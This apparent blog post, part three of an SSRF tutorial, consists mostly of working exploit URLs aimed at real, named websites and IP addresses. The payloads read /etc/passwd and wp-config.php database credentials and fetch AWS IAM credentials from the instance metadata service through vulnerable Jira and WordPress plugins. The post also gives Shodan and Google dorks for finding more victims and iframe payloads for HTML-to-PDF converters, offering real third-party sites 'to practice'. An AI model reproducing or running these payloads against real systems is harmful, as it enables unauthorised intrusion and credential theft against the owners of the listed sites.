SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-3

Lets get in to Live Examples

The author of this BLOG is no way responsible for any misuse of the information.

4. Live Examples -

Lets look in to basic SSRF

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/

Here the page parameter fetch external resource and display its content

SSRF to XSS -

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

Read Local files -

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

When you try other URL schemas like DICT gives an error

 Warning: file_get_contents(): Unable to find the wrapper “dict” — did you forget to enable it when you configured PHP

This indicates DICT URL schemas is not enabled

In the same way you can try other URL schemas and find which all are enabled and use them to exploit it further

SSRF in FFMPEG -

Read local files

Working vulnerable site -

https://www.onlinevideoconverter.com/
https://www.files-conversion.com/

Repo Link - https://github.com/neex/ffmpeg-avi-m3u-xbin

SSRF in Widely used Plugins and CMS -

SSRF in Jira -

Jira version < 7.3.5 are suffering from SSRF

https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…

There are more than 40k jira sites on shodan. You can find them using below dorks

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google" -- For Google

Now lets see some vulnerable Sites

https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details 
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://www.mfjira.io/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Details
https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Details
http://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details

These are some vulnerable sites I found

SSRF in JSmol2WP Wordpress Plugin -

JSmol2WP version below 1.07 has an Unauthenticated Server Side Request Forgery

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Dork -

inurl:wp-content/plugins/jsmol2wp

Vulnerable sites -

https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.com
http://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details

SSRF in Qards Wordpress Plugin -

Qards is vulnerable to Server Side Request Forgery (SSRF)

http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

Dork -

inurl:wp-content/plugins/qards

Vulnerable sites -

http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

SSRF in HTML to PDF conversion -

Vulnerable sites -

https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/

Content of Ssrf.html

"><iframe src="file:///etc/passwd"></iframe>
"><svg/onload=document.write(document.location)> -- to know the path and some times to know what os they are using at backend

All these sites posted above are just to let you practice , I am not responsible for any misuse of the information.